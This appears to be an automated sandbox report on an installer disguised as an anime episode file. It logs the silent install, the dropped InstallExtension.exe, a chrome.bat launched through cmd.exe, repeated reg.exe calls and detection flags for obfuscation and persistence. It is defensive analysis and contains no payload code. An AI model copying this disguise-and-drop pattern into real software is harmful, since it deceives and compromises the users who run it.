Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000B44E9 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,5_2_000B44E9
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmpJump to behavior
Source: classification engineClassification label: sus26.winEXE@73/269@12/0
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00052F23 GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,4_2_00052F23
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: vcRuntimeAdditional_x64.5.dr, 3cd711.msi.15.drBinary or memory string: SELECT `WixDependencyProvider`.`WixDependencyProvider`, `WixDependencyProvider`.`Component_`, `WixDependencyProvider`.`ProviderKey`, `WixDependencyProvider`.`Attributes` FROM `WixDependencyProvider`SELECT `WixDependency`.`WixDependency`, `WixDependencyProvider`.`Component_`, `WixDependency`.`ProviderKey`, `WixDependency`.`MinVersion`, `WixDependency`.`MaxVersion`, `WixDependency`.`Attributes` FROM `WixDependencyProvider`, `WixDependency`, `WixDependencyRef` WHERE `WixDependency`.`WixDependency` = `WixDependencyRef`.`WixDependency_` AND `WixDependencyProvider`.`WixDependencyProvider` = `WixDependencyRef`.`WixDependencyProvider_`WixDependencyRequireFailed to initialize.Failed to initialize the registry functions.ALLUSERSFailed to ensure required dependencies for (re)installing components.WixDependencyCheckFailed to ensure absent dependents for uninstalling components.WixDependencySkipping the dependency check since no dependencies are authored.Failed to check if the WixDependency table exists.Failed to initialize the unique dependency string list.Failed to open the query view for dependencies.Failed to get WixDependency.WixDependency.Failed to get WixDependencyProvider.Component_.Skipping dependency check for %ls because the component %ls is not being (re)installed.Failed to get WixDependency.ProviderKey.Failed to get WixDependency.MinVersion.Failed to get WixDependency.MaxVersion.Failed to get WixDependency.Attributes.Failed dependency check for %ls.Failed to enumerate all of the rows in the dependency query view.Failed to create the dependency record for message %d.Unexpected message response %d from user or bootstrapper application.Failed to get the ignored dependents.ALLFailed to check if "ALL" was set in IGNOREDEPENDENCIES.Skipping the dependencies check since IGNOREDEPENDENCIES contains "ALL".WixDependencyProviderSkipping the dependents check since no dependency providers are authored.Failed to check if the WixDependencyProvider table exists.Failed to open the query view for dependency providers.Failed to get WixDependencyProvider.WixDependencyProvider.Failed to get WixDependencyProvider.Component.Skipping dependents check for %ls because the component %ls is not being uninstalled.Failed to get WixDependencyProvider.ProviderKey.Failed to get WixDependencyProvider.Attributes.Failed dependents check for %ls.Failed to enumerate all of the rows in the dependency provider query view.;IGNOREDEPENDENCIESFailed to get the string value of the IGNOREDEPENDENCIES property.Failed to create the string dictionary.Failed to ignored dependency "%ls" to the string dictionary.wixdepca.cppNot enough memory to create the message record.Failed to set the message identifier into the message record.Failed to set the number of dependencies into the message record.The dependency "%ls" is missing or is not the required version.Found dependent "%ls", name: "%ls".Failed to set the dependency key "%ls" into the message record.Failed to set the dependency name "%ls" into
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004FD20 FormatMessageW,GetLastError,LocalFree,4_2_0004FD20
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00036945 ChangeServiceConfigW,GetLastError,4_2_00036945
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Program Files\InstallerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: cabinet.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: msi.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: version.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: wininet.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: comres.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: clbcatq.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: msasn1.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: crypt32.dll4_2_00011070
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCommand line argument: feclient.dll4_2_00011070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: cabinet.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: msi.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: version.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: wininet.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: comres.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: clbcatq.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: msasn1.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: crypt32.dll5_2_000B1070
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCommand line argument: feclient.dll5_2_000B1070
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: VC_redist.x64.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: VC_redist.x64.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: Boku no Hero Academia 6th Season - Episode 13.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpWindow found: window name: TMainFormJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpAutomated click: Next >
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeWindow detected: Number of UI elements: 23
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeWindow detected: Number of UI elements: 23
Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF4C347D-954E-4543-88D2-EC17F07F466F}
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic file information: File size 25461096 > 1048576
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpDirectory created: C:\Program Files\InstallerJump to behavior
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: certificate valid
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: VC_redist.x64.exe, 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000004.00000000.270201080.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000005.00000000.271727251.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000007.00000000.285438279.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000007.00000002.368408492.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000010.00000002.324092324.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000010.00000000.318798304.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000002.375653352.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000000.322751737.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000002.373692696.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000000.324242625.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000013.00000002.366393157.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000014.00000002.363516573.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000019.00000002.371119144.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000019.00000000.348409137.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 0000001B.00000002.368331825.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001C.00000002.366244549.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001D.00000002.356595702.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe.5.dr, VC_redist.x64.exe.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: msvcp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFCM140U.amd64.pdb source: mfcm140u.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: msvcp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcamp140.amd64.pdb source: vcamp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140DEU.amd64.pdb source: mfc140deu.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ENU.amd64.pdb source: mfc140enu.dll.15.dr
Source: Binary string: C:\Users\dsaxc\Desktop\InstallExtension\x64\Release\InstallExtension.pdb source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.392947585.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, InstallExtension.exe, 0000001E.00000000.378319985.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 0000001E.00000002.382242447.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000000.382129606.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000002.387277253.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, is-NDGJF.tmp.3.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\concrt140.amd64.pdb source: concrt140.dll.15.dr
Source: Binary string: C:\Users\dsaxc\Desktop\InstallExtension\x64\Release\InstallExtension.pdb%% source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.392947585.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, InstallExtension.exe, 0000001E.00000000.378319985.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 0000001E.00000002.382242447.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000000.382129606.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000002.387277253.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, is-NDGJF.tmp.3.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_atomic_wait.amd64.pdbGCTL source: msvcp140_atomic_wait.dll.15.dr
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\WixStdBA.pdb source: wixstdba.dll.5.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_atomic_wait.amd64.pdb source: msvcp140_atomic_wait.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_2.amd64.pdb source: msvcp140_2.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140JPN.amd64.pdb source: mfc140jpn.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcamp140.amd64.pdbGCTL source: vcamp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_2.amd64.pdbGCTL source: msvcp140_2.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\concrt140.amd64.pdbGCTL source: concrt140.dll.15.dr
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\WixDepCA.pdb source: vcRuntimeAdditional_x64.5.dr, 3cd711.msi.15.dr

Data Obfuscation

barindex
Obfuscated command line found
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe"
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" Jump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp "C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E876 push ecx; ret 4_2_0003E889
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DE876 push ecx; ret 5_2_000DE889
Source: Boku no Hero Academia 6th Season - Episode 13.exeStatic PE information: section name: .didata
Source: Boku no Hero Academia 6th Season - Episode 13.tmp.0.drStatic PE information: section name: .didata
Source: Boku no Hero Academia 6th Season - Episode 13.tmp.2.drStatic PE information: section name: .didata
Source: is-DLQHQ.tmp.3.drStatic PE information: section name: .wixburn
Source: VC_redist.x64.exe.4.drStatic PE information: section name: .wixburn
Source: VC_redist.x64.exe.5.drStatic PE information: section name: .wixburn
Source: VC_redist.x64.exe.7.drStatic PE information: section name: .wixburn
Source: mfc140.dll.15.drStatic PE information: section name: .didat
Source: mfc140u.dll.15.drStatic PE information: section name: .didat
Source: mfcm140.dll.15.drStatic PE information: section name: .nep
Source: mfcm140u.dll.15.drStatic PE information: section name: .nep
Source: vcomp140.dll.15.drStatic PE information: section name: _RDATA
Source: vcruntime140.dll.15.drStatic PE information: section name: _RDATA
Source: mfc140.dll.15.drStatic PE information: 0xFBD5982D [Wed Nov 21 09:09:01 2103 UTC]

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeJump to dropped file
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: \boku no hero academia 6th season - episode 13.exe
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmp
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: \boku no hero academia 6th season - episode 13.exe
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmp
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmp
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmp
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: \boku no hero academia 6th season - episode 13.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmpJump to behavior
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: \boku no hero academia 6th season - episode 13.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: \boku no hero academia 6th season - episode 13.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71e.rbf (copy)Jump to dropped file
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeFile created: C:\Windows\Temp\{7B1AA818-8405-4B0F-ACAF-0273ABC8852E}\.ba\wixstdba.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140jpn.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140ita.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140esn.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70e.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140deu.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71b.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd708.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd718.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140chs.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfcm140u.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd722.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140enu.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\WindowsApp\is-NDGJF.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\concrt140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140fra.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70b.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vccorlib140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd707.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71c.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcruntime140_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_atomic_wait.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\vcomp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71d.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70d.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140cht.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140rus.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfcm140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140kor.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140_2.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140u.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\msvcp140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QUMRA.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd724.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\System32\mfc140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd71f.rbf (copy)Jump to dropped file
Source: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exeFile created: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: 3cd70a.rbf (copy)Jump to dropped file
